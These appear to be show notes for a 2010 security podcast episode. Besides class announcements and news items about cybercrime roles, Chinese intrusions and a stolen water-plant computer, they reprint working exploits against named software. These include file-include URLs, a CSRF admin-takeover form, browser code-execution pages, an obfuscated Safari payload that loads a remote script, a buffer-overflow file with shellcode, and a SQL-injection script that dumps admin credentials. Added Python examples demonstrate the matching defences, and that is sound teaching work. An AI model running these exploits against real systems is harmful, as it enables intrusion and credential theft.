ISD Podcast Episode 97 for March 29, 2010. This podcast is our contribution back to the community, where we discuss the vulnerabilities of interest and information security related news, hopefully providing you with a few laughs and a little knowledge.
Announcements:
MyHardDriveDied.com:
- Data Recovery Class is $3500. For all classes, to reserve and register please complete this form and return it to me by email (smoulton@nicservices.com) or fax (770-926-7089), or go to http://www.myharddrivedied.com/seated-class-cc-form.pdf. Here are the current dates and locations for the classes:
- Washington DC – April 12th – 16th
- San Diego – May 10th – 14th
- San Francisco – June 14th – 18th
- Atlanta – July 12th – 16th
- Chicago – September 13th – 17th
- Dallas, TX – October 11th – 15th
- Washington DC – December 6th – 10th
- Hard Drive Kung Fu Magic – Outerzone 6 2010 by Scott Moulton
SANS Community Atlanta:
- SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression April 15 – 21, 2010 (http://www.sans.org/atlanta-security-leadership-2010-cs)
- SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)
SANS Mentoring Program:
- Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)
Notacon 7
- April 15th – 18th, 2010 Cleveland, Ohio
- http://notacon.org/
- Adrian will be there presenting on Anti-Forensics
Kentuckiana Metasploit Class
- May 8, 2010 Jeffersonville, Indiana
- (No URL for that as of yet)
- Proceeds will be going to the Hackers for Charity Food For Work Program
Friends of the Podcast:
Webhosting services: WebSpeedway
Vulnerabilities of Interest:
- Pc4Uploader is subject to a Local File Include (LFI) vulnerability. Versions 9.0 through 10.0 are impacted. A proof-of-concept URL is available: http://www.sample.com/up/index.php?PHPSESSID=2e970d2361293815462ffaa028135c23;tempst=../../../../../../../../boot.ini%00
- AdaptCMS_Lite_1.5 is subject to a vulnerability that lets an attacker change the admin username and password and add a new admin user. Version 1.5 (2009-07-07) is impacted. Exploit code is available:
<html>
<head>
</head>
<body>
<h2>coded by ahmadbady</h2>
<form action='admin.php?view=edit_users2&id=1' method='post'>
<table cellpadding='5' cellspacing='0' border='0' width='480' style='padding-left:5px' align='left'>
<tr><td>Username</td><td><input type='text' name='username1' size='16' value='anything' style='font-family: tahoma; font-size: 11px; border: 1px solid #444444;padding-left:1px'></td></tr>
<tr><td>New Password?</td><td><input type='text' name='password1' size='16' style='font-family: tahoma; font-size: 11px; border: 1px solid #444444;padding-left:1px'></td></tr>
<tr><td>E-Mail</td><td><input type='text' name='email1' size='16' value='anything' style='font-family: tahoma; font-size: 11px; border: 1px solid #444444;padding-left:1px'></td></tr>
<tr><td>Level</td><td><select name='level' style='font-family: tahoma; font-size: 11px; border: 1px solid #444444;padding-left:1px'><option value='Admin' selected>Admin - Level 1</option><option value='Member'>Member - Level 3</option><option value='Staff'>Staff - Level 2</option></select></td></tr>
<tr><td><input type='submit' value='Update User' style='font-family: tahoma; font-size: 11px; border: 1px solid #444444;padding-left:1px'></td></tr>
</table></form>
</body>
</html>
- 68kb is subject to multiple Remote File Include (RFI) vulnerabilities. Version 1.0.0rc2 is impacted. Example URLs are available:
http://www.sample.com/themes/front/default/modules/show.php?file=shell.txt?
http://www.sample.com/themes/admin/default/modules/show.php?file=shell.txt?
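The AdaptCMS_Lite PoC above is nothing more than an HTML form that posts the application's own field names (username1, password1, email1, level) to admin.php; a form like that only succeeds when the server accepts a state-changing POST on the strength of the victim administrator's session cookie alone. The following Python is an added example, not code from the podcast or from AdaptCMS, showing the server-side check that defeats it: the edit handler demands a per-session anti-forgery token that a third-party page cannot read, and rejects a mismatched Origin header as a cheaper first line. SITE_ORIGIN, SESSIONS, USERS, edit_user_unprotected and edit_user_protected are hypothetical names built for this demo; the PoC's field values are replayed against both handlers.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional, Tuple

SITE_ORIGIN = "https://cms.example"  # constructed origin of the CMS for this demo

# Constructed in-memory stand-ins for the CMS session store and user table.
SESSIONS: Dict[str, dict] = {}
USERS: Dict[int, dict] = {
    1: {"username": "admin", "email": "admin@cms.example", "level": "Admin", "password_hash": ""},
}
LEVELS = ("Admin", "Staff", "Member")  # the three levels offered by the PoC's <select>


def new_session(user_id: int) -> str:
    """Log a user in and bind a fresh, unguessable anti-forgery token to the session."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user_id": user_id, "csrf": secrets.token_urlsafe(32)}
    return sid


def csrf_token_for(sid: str) -> str:
    """Token the legitimate edit form embeds as a hidden <input name='csrf_token'>."""
    return SESSIONS[sid]["csrf"]


def _apply_edit(form: dict, target_id: int) -> Tuple[int, str]:
    """Shared update logic: validates the level and hashes any new password."""
    if form.get("level") not in LEVELS:
        return 400, "unknown level"
    user = USERS[target_id]
    user["username"] = form["username1"]
    user["email"] = form["email1"]
    user["level"] = form["level"]
    if form.get("password1"):
        # Demo-only fixed salt; a real store uses a random per-user salt.
        user["password_hash"] = hashlib.pbkdf2_hmac(
            "sha256", form["password1"].encode(), b"constructed-salt", 100_000).hex()
    return 200, "user updated"


def edit_user_unprotected(sid: str, form: dict, target_id: int) -> Tuple[int, str]:
    """The failure mode the PoC relies on: only the session cookie is checked."""
    session = SESSIONS.get(sid)
    if session is None or USERS[session["user_id"]]["level"] != "Admin":
        return 403, "admin session required"
    return _apply_edit(form, target_id)


def edit_user_protected(sid: str, origin: Optional[str], form: dict,
                        target_id: int) -> Tuple[int, str]:
    """Hardened handler: same session check plus Origin and per-session token checks."""
    session = SESSIONS.get(sid)
    if session is None or USERS[session["user_id"]]["level"] != "Admin":
        return 403, "admin session required"
    # Browsers attach Origin to cross-site form posts; a mismatch is rejected outright.
    if origin is not None and origin != SITE_ORIGIN:
        return 403, "cross-origin request rejected"
    # An attacker's page cannot read this per-session secret; compare in constant time.
    if not hmac.compare_digest(form.get("csrf_token", ""), session["csrf"]):
        return 403, "missing or invalid anti-forgery token"
    return _apply_edit(form, target_id)


def demo() -> Dict[str, int]:
    """Replay the PoC's form values against both handlers and report the status codes."""
    sid = new_session(1)
    forged = {"username1": "anything", "password1": "anything",
              "email1": "anything", "level": "Admin"}
    unprotected = edit_user_unprotected(sid, forged, 1)[0]
    USERS[1].update(username="admin", email="admin@cms.example")  # reset the demo user
    forged_origin = edit_user_protected(sid, "https://evil.example", forged, 1)[0]
    no_token = edit_user_protected(sid, None, forged, 1)[0]  # Origin absent, no token
    legit = dict(forged, csrf_token=csrf_token_for(sid))
    legitimate = edit_user_protected(sid, SITE_ORIGIN, legit, 1)[0]
    return {"unprotected": unprotected, "forged_origin": forged_origin,
            "no_token": no_token, "legitimate": legitimate}


if __name__ == "__main__":
    print(demo())
```

Run stand-alone it prints the four outcomes: the unprotected handler accepts the forged form (200), the protected one refuses it both with a foreign Origin and with no token (403), and the same form succeeds once it carries the token from the administrator's own page. The token check is the one that matters; the Origin check is kept because it costs nothing and fails closed only for cross-site posts.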
- Netscape Navigator, the Namoroka web browser and the Flock browser are subject to a URL code execution vulnerability. Version 9.0.0.6 of Netscape Navigator is impacted. Exploit code is available:
<html>
<head>
<title>firelinking By eidelweiss</title>
<!-- Copyright (C) 2009-2010 firelinking by eidelweiss -->
<!-- Greets: AL-MARHUM , [D]eal [C]yber , My Mother (i miss u) , and all my friends -->
<!-- This PoC is cross platform : On Windows this example creates the file -->
<!-- c:\mampus.bat and launches it (opens a dos box with a dir command). On -->
<!-- Linux (tested Fedora Core) the example creates the file -->
<!-- ~/mampus.txt Depending on caching the script might -->
<!-- run twice in some cases (this will create an additional mampus-1.txt). -->
<link rel="SHORTCUT ICON" href="favicon.ico">
<script language="JavaScript" type="text/javascript">
var pf = navigator.platform.toLowerCase();
var os;
if (pf.indexOf("win") != -1) {
os = "win";
} else if (pf.indexOf("linux") != -1) {
os = "linux";
}
function GoFuck() {
// this is a bad caching workaround inside
document.getElementById('outhtml').innerHTML = "";
document.getElementById('outhtml').innerHTML += document.getElementById('clearhtml').value;
document.getElementById('outhtml').innerHTML += document.getElementById('clearhtml').value;
document.getElementById('outhtml').innerHTML += document.getElementById('clearhtml').value;
window.setTimeout("document.getElementById('outhtml').innerHTML += document.getElementById('linkhtml_" + os + "').value", 300);
}
</script>
</head>
<body>
<div style="font-family:Verdana;font-size:11px;"><div style="font-family:Verdana;font-size:15px;font-weight:bold;">firelinking By eidelweiss</div>
<br><br>
<div style="width:600px">
<div id="outhtml" style="display:none"></div>
<textarea id="clearhtml" style="display:none">
<link rel="SHORTCUT ICON" href="favicon.ico">
</textarea>
<textarea id="linkhtml_win" style="display:none">
<link rel="SHORTCUT ICON" href="view-source:javascript:delayedOpenWindow('javascript:netscape.security.PrivilegeManager.enablePrivilege(\'UniversalXPConnect\');file=Components.classes[\'@mozilla.org/file/local;1\'].createInstance(Components.interfaces.nsILocalFile);file.initWithPath(\'c:\\\\mampus.bat\');file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420);outputStream=Components.classes[\'@mozilla.org/network/file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutputStream);outputStream.init(file,0x04|0x08|0x20,420,0);output=\'@ECHO OFF\\n:BEGIN\\nCLS\\nDIR\\nPAUSE\\n:END\';outputStream.write(output,output.length);outputStream.close();file.launch();','','')">
</textarea>
<textarea id="linkhtml_linux" style="display:none">
<link rel="SHORTCUT ICON" href="view-source:javascript:delayedOpenWindow('javascript:netscape.security.PrivilegeManager.enablePrivilege(\'UniversalXPConnect\');file=Components.classes[\'@mozilla.org/file/local;1\'].createInstance(Components.interfaces.nsILocalFile);file.initWithPath(\'~/mampus.txt\');file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420);outputStream=Components.classes[\'@mozilla.org/network/file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutputStream);outputStream.init(file,0x04|0x08|0x20,420,0);output=\'mampus!\';outputStream.write(output,output.length);outputStream.close();','','')">
</textarea>
<br><br>
<a href="#" onclick="GoFuck()">Run exploit</a>
</div>
</div>
</body>
</html>
- Apple Safari is subject to a history search vulnerability. A code execution exploit PoC is available:
<!--
Copyright (C) 2009-2010 firelinking by eidelweiss
Greets: AL-MARHUM , [D]eal [C]yber , My Mother (i miss u)
Credit: JosS (hackown) , r0073r & 0x1D (inj3ct0r) , YOGYACARDERLINK
This P0C made for Educational Purpose only
Author Will Be not responsible For Any Damage.
-->
<html>
<script>
function Dick() {
window.open('safari:historysearch?q=%2A"><img src=\'Dick\' Dickonerror=\'evalalert(String.fromCharCode(113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,113,41,59))\'>&p=1&s=1');
window.setTimeout("location.href='mailto:'", 6666);
}
</script>
<body scrolling="no">
<a href="#" onclick="Dick()">Suck Please...</a>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /><br />
<br />
<br />
<br />
<br />
<br />
<br />
<img src=\'Dick\' Dickonerror='evalalert(String.fromCharCode(113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,113,41,59))'>
</body>
</html>
- Open Web Analytics is subject to multiple file include vulnerabilities. Version 1.2.3 is impacted. A PoC URL is available: http://www.sample.com/mw_plugin.php?IP=shell.txt?
- MyOWNspace is subject to multiple file include vulnerabilities. Version 8.2 is impacted. Example URLs are available:
http://www.sample.com/graph.php?go=../../../../../../../boot.ini%00
http://www.sample.com/myowngraph.php?go=../../../../../../../boot.ini%00
http://www.sample.com/showmyownfriends.php?go=../../../../../../../boot.ini%00
- DaFun Spirit is subject to a Remote File Inclusion (RFI) vulnerability. Version 2.2.5 is impacted. Example URLs are available:
http://www.sample.com/modules/dfss/lgsl/lgsl_players.php?lgsl_path=http://[shellscript]
http://www.sample.com/modules/dfss/lgsl/lgsl_settings.php?lgsl_path=http://[shellscript]
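The Pc4Uploader, 68kb, Open Web Analytics, MyOWNspace and DaFun Spirit entries above are all the same class of bug: a request parameter is handed to include() or a file open, and the PoC URLs show the three tells a defender can key on (directory traversal, a trailing %00 to truncate an appended extension, and an absolute URL where a file name belongs). The Python below is an added example, not code from the podcast or from any of those products. It scans constructed Apache-style access-log lines modelled on those PoC URLs for the three indicators, and shows the application-side counterpart: an include-path check that resolves the requested name and refuses anything outside the module directory. SAMPLE_LOG, the addresses and timestamps in it, scan_access_log and resolve_include are all constructed for this demo; the parameter names (tempst, file, lgsl_path) are the ones in the entries above.

```python
import re
from pathlib import Path
from typing import Dict, List, Optional
from urllib.parse import unquote, urlsplit

# Constructed Apache combined-format lines modelled on the PoC URLs above;
# client addresses, timestamps and byte counts are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [29/Mar/2010:10:01:02 -0400] "GET /up/index.php?tempst=../../../../../../../../boot.ini%00 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [29/Mar/2010:10:01:05 -0400] "GET /themes/front/default/modules/show.php?file=http://198.51.100.9/shell.txt? HTTP/1.1" 200 8841 "-" "Mozilla/5.0"
203.0.113.7 - - [29/Mar/2010:10:01:07 -0400] "GET /modules/dfss/lgsl/lgsl_players.php?lgsl_path=http://198.51.100.9/ HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
192.0.2.44 - - [29/Mar/2010:10:02:11 -0400] "GET /graph.php?go=weekly HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
192.0.2.44 - - [29/Mar/2010:10:02:13 -0400] "GET /index.php?page=about HTTP/1.1" 200 1902 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')


def classify_value(raw: str) -> List[str]:
    """Name the file-include indicators present in one raw (still URL-encoded) query value."""
    v = unquote(raw)
    findings = []
    if "\x00" in v:
        findings.append("null-byte")      # %00 truncation, as in the boot.ini PoCs
    if "../" in v or "..\\" in v:
        findings.append("traversal")
    if re.match(r"^(https?|ftp)://", v, re.IGNORECASE):
        findings.append("remote-url")     # RFI: an absolute URL where a file name belongs
    if re.search(r"(boot\.ini|/etc/passwd|win\.ini)$", v.rstrip("\x00"), re.IGNORECASE):
        findings.append("sensitive-file")
    return findings


def scan_access_log(text: str) -> List[Dict[str, object]]:
    """Flag every request whose query string carries LFI/RFI indicators."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for part in urlsplit(m.group("target")).query.split("&"):
            name, _, raw = part.partition("=")
            hits = classify_value(raw)
            if hits:
                alerts.append({"ip": m.group("ip"), "ts": m.group("ts"), "param": name,
                               "value": unquote(raw), "indicators": hits})
    return alerts


def resolve_include(base_dir: str, requested: str,
                    allowed_suffixes=(".php", ".html")) -> Optional[Path]:
    """Application-side counterpart: accept only includes that stay under base_dir."""
    if "\x00" in requested or re.match(r"^[a-z][a-z0-9+.-]*://", requested, re.IGNORECASE):
        return None                       # null bytes and URL schemes are never file names
    base = Path(base_dir).resolve()
    candidate = (base / requested).resolve()   # resolve() collapses any ../ segments
    if base not in candidate.parents or candidate.suffix not in allowed_suffixes:
        return None
    return candidate


if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_LOG):
        print(alert)
```

Run stand-alone it prints three alerts, one per hostile line, each listing which indicators fired and against which parameter; the two ordinary requests produce nothing. resolve_include is the check the vulnerable scripts lack: it answers None for the traversal and remote-URL values and only returns a path for a name that resolves inside the module directory with an expected extension.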
- Mini-Stream Ripper is subject to a local stack buffer overflow vulnerability. Version 3.1.0.8 is impacted. Exploit code is available:
# Mini-stream Ripper 3.1.0.8 => Local stack overflow exploit
# Author: Hazem Mofeed
# Download: http://www.mini-stream.net/mini-stream-ripper/download/
# Home: http://hakxer.wordpress.com
# [BUFFER] + [ RET ] + [ RET ] + [SHELLCODE] --> Exploited ..
# http://www.exploit-db.com/exploits/11607
# (Byte literals and binary mode so the file is written unchanged under Python 3.)
shellcode = (b"\xeb\x16\x5b\x31\xc0\x50\x53\xbb\x0d\x25\x86\x7c\xff\xd3\x31\xc0"
             b"\x50\xbb\x12\xcb\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63\x61\x6c"
             b"\x63\x2e\x65\x78\x65\x00")  # SP3(sh)
# exploit
exploit = (b"\x41" * 43496 + b"\x08\x6A\x83\x7C" +
           b"\x08\x6A\x83\x7C" + shellcode)
with open("exploit.smi", "wb") as f:
    f.write(exploit)
- SiteX CMS is subject to a SQL injection vulnerability. Version 0.7.4 Beta is impacted. Exploit code is available:
<?php
echo "\n\n###########################################################################\n";
echo "####\n";
echo "## Product: SiteX CMS 0.7.4 beta (/photo.php) SQL-Injection exploit ##\n";
echo "## Usage: php.exe sitex.php www.site.com /cmspath/ ##\n";
echo "## Require: Magic_quotes = off ##\n";
echo "## Author: Sc0rpi0n [RUS] (http://scorpion.su) ##\n";
echo "## Special for Antichat (forum.antichat.ru) ##\n";
echo "## Bugs find: Iceangel_, [x60]unu, .:[melkiy]:. ##\n";
echo "####\n";
echo "###########################################################################\n\n";
$host=$argv[1];
$path=$argv[2];
$script="photo.php?albumid=";
$sql=urlencode("-1' UNION SELECT 1,concat(0x3a3a,username,0x3a3a3a,password,0x3a3a3a3a),3,4,5,6,7,8 FROM SiteX_Users WHERE -- ");
$fsock=fsockopen($host,80);
$headers="GET http://$host$path$script$sql HTTP/1.0\r\n";
$headers.="Host: $host\r\n\r\n";
fwrite($fsock,$headers);
$response="";
while(!feof($fsock))
    $response.=fread($fsock,1024);
// The injected concat() brackets the fields with ::, ::: and :::: so they can be sliced out of the page.
$pos1=strpos($response,"::") or die("## http://$host is not vulnerable or error\n");
$pos2=strpos($response,":::") or die("## http://$host is not vulnerable or error\n");
$pos3=strpos($response,"::::") or die("## http://$host is not vulnerable or error\n");
$len1=$pos2-$pos1;
$len2=$pos3-$pos2;
$login=substr($response,$pos1+2,$len1-2);
$password=substr($response,$pos2+3,$len2-3);
echo "## Host: $argv[1]\n";
echo "## Login: $login\n";
echo "## Password: $password\n";
?>
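The SiteX exploit above works because photo.php splices albumid straight into its SQL, so a quote ends the string and a UNION with the same number of columns pulls rows from SiteX_Users into the photo listing; the ::/:::/:::: markers exist only so the script can find the fields in the HTML. The Python below is an added example, not code from the podcast or from SiteX, that reproduces the two sides in an in-memory SQLite database: a string-built query that the payload breaks, and the parameterized, integer-validated query that treats the same payload as data. The schema, column names and PAYLOAD are constructed; PAYLOAD is a SQLite translation of the page's MySQL payload, using || in place of concat() and quoted strings in place of the 0x3a3a hex literals.

```python
import sqlite3
from typing import List, Tuple

# SQLite translation of the page's MySQL payload; constructed for this demo.
PAYLOAD = ("-1' UNION SELECT 1,'::'||username||':::'||password||'::::',3,4,5,6,7,8 "
           "FROM SiteX_Users -- ")


def build_db() -> sqlite3.Connection:
    """Constructed schema with the eight-column shape the PoC's UNION implies."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE SiteX_Users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        CREATE TABLE SiteX_Photos(id INTEGER PRIMARY KEY, albumid INTEGER, title TEXT,
                                  c4 TEXT, c5 TEXT, c6 TEXT, c7 TEXT, c8 TEXT);
        INSERT INTO SiteX_Users(username, password) VALUES ('admin', 'constructed-hash');
        INSERT INTO SiteX_Photos(albumid, title, c4, c5, c6, c7, c8)
            VALUES (1, 'holiday', 'x', 'x', 'x', 'x', 'x');
    """)
    return con


def photos_vulnerable(con: sqlite3.Connection, albumid: str) -> List[Tuple]:
    """String-built query of the kind the PoC targets (constructed reconstruction)."""
    sql = ("SELECT id,title,albumid,c4,c5,c6,c7,c8 FROM SiteX_Photos "
           "WHERE albumid='" + albumid + "'")   # the quote in PAYLOAD closes this literal
    return con.execute(sql).fetchall()


def photos_parameterized(con: sqlite3.Connection, albumid: str) -> List[Tuple]:
    """Hardened: the value is validated as an integer and bound, never spliced into SQL."""
    try:
        album = int(albumid)
    except ValueError:
        raise ValueError("albumid must be an integer") from None
    return con.execute(
        "SELECT id,title,albumid,c4,c5,c6,c7,c8 FROM SiteX_Photos WHERE albumid=?",
        (album,)).fetchall()


def extract_creds(body: str) -> Tuple[str, str]:
    """The same ::/:::/:::: slicing the PHP script performs on the response body."""
    p1, p2, p3 = body.find("::"), body.find(":::"), body.find("::::")
    if -1 in (p1, p2, p3):
        raise ValueError("markers not found; query was not injectable")
    return body[p1 + 2:p2], body[p2 + 3:p3]


def demo() -> Tuple[str, str]:
    """Run PAYLOAD through the vulnerable query and parse the result as the PHP does."""
    con = build_db()
    rows = photos_vulnerable(con, PAYLOAD)
    body = "\n".join(str(col) for row in rows for col in row)  # stand-in for the HTML page
    return extract_creds(body)


if __name__ == "__main__":
    print("vulnerable query leaks:", demo())
    con = build_db()
    print("parameterized, albumid=1:", photos_parameterized(con, "1"))
    try:
        photos_parameterized(con, PAYLOAD)
    except ValueError as exc:
        print("parameterized, payload:", exc)
```

Run stand-alone it shows the vulnerable path returning the admin row's username and password in place of a photo, and the parameterized path refusing the payload before any SQL runs. Binding alone would already neutralise the UNION (the whole payload becomes one string compared against albumid); the int() check on top documents the contract that albumid is a number and gives a clean error instead of an empty listing.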
Stories of Interest:
News item 1: http://www.computerworld.com/s/article/9173965/FBI_lists_Top_10_posts_in_cybercriminal_operations?taxonomyId=17
Criminal hacker organizations are operating with increasing corporate-life efficiency, specialization and expertise, according to the FBI.
From a business perspective, these criminal enterprises are highly productive and staffed by dedicated people willing to operate worldwide, around the clock “without holidays, weekends or vacations,” according to
Steven Chabinsky, deputy assistant director in the FBI’s cyber division. “As a result, when an opportunity presents itself these criminals can start planning within hours.”
According to the FBI the top 10 positions in cyber criminal organizations are:
1. Coders/programmers, who write the exploits and malware used by the criminal enterprise. Contrary to popular belief, Chabinsky noted that coders who knowingly take part in a criminal enterprise are not protected by the First Amendment.
2. Distributors, who trade and sell stolen data and act as vouchers for the goods provided by other specialists.
3. Tech experts, who maintain the criminal enterprise’s IT infrastructure, including servers, encryption technologies, databases, and the like.
4. Hackers, who search for and exploit applications, systems and network vulnerabilities.
5. Fraudsters, who create and deploy various social engineering schemes, such as phishing and spam.
6. Hosted systems providers, who offer safe hosting of illicit content servers and sites.
7. Cashiers, who control drop accounts and provide names and accounts to other criminals for a fee.
8. Money mules, who complete wire transfers between bank accounts. The money mules may use student and work visas to travel to the U.S. to open bank accounts.
9. Tellers, who are charged with transferring and laundering illicitly gained proceeds through digital currency services and different world currencies.
10. Organization Leaders, often “people persons” without technical skills. The leaders assemble the team and choose the targets.
News item 2: http://www.computerworld.com/s/article/9174242/Military_warns_of_increasingly_active_cyber_threat_from_China_
On the same day that Google Inc. and the GoDaddy Group Inc. complained about China to a congressional committee, U.S. Navy Admiral Robert Willard appeared before the U.S. House Armed Services Committee with an even stronger warning about cyber-threats posed by China.
Willard’s comments about China received little press attention but were stronger than anything said by either company.
“U.S. military and government networks and computer systems continue to be the target of intrusions that appear to have originated from within the PRC (People’s Republic of China),” said Willard.
He said that most of the intrusions are focused on acquiring data “but the skills being demonstrated would also apply to network attacks.”
Willard testified on the military’s operations in its Pacific command, which he said “faces increasingly active and sophisticated threats to our information and computer infrastructure.”
News item 3: http://www.telegraph.co.uk/news/newstopics/howaboutthat/7532996/Ageing-spies-unable-to-use-the-internet.html
The Security Service is launching an unprecedented round of redundancies to improve the overall level of computer skills among its staff.
Despite an expanding budget, MI5 is laying off employees in order to hire new intelligence officers and support staff with better command of information technology and other “deployable” skills.
The redundancy programme has set tongues wagging in Whitehall, with civil servants in other departments joking about a “James Bond generation” of elderly spies being put out to pasture because they can’t use the internet and don’t understand the world of Twitter or Facebook.
The plan was disclosed by Jonathan Evans, the director-general of MI5. He told a Parliamentary committee that he is concerned that his agency’s overall IT skills are not up to scratch, leading him to get rid of some employees.
News item 4: http://www.kptv.com/news/22964989/detail.html
The theft of a computer from Molalla’s water treatment facility is being considered a federal crime by authorities. Someone broke into the water plant Saturday night and stole the computer, which was what kept the plant working on auto pilot. Water service to Molalla has not been affected, but workers must operate the plant the old-fashioned way.
“It has to be manually run and also inspected (so) visual checks can be made,” said Marc Howatt, the city’s public works director.
The thieves broke into the water plant through a back window. Once inside, Howatt said, the thief triggered a motion detector and an on-call manager rushed to the facility and found the front door open and one of the computers gone.
The computer contained software that monitored the water pumps, reservoir and chlorine levels. “The software enables ease of operation,” Howatt said. “It allows the operator to log onto a screen and see what’s happening with the plant at any given time during the day.” The following day, workers found the computer in a pond on the property. City officials said it’s destroyed, but a technician is trying to salvage the hard drive and the costly programming on it.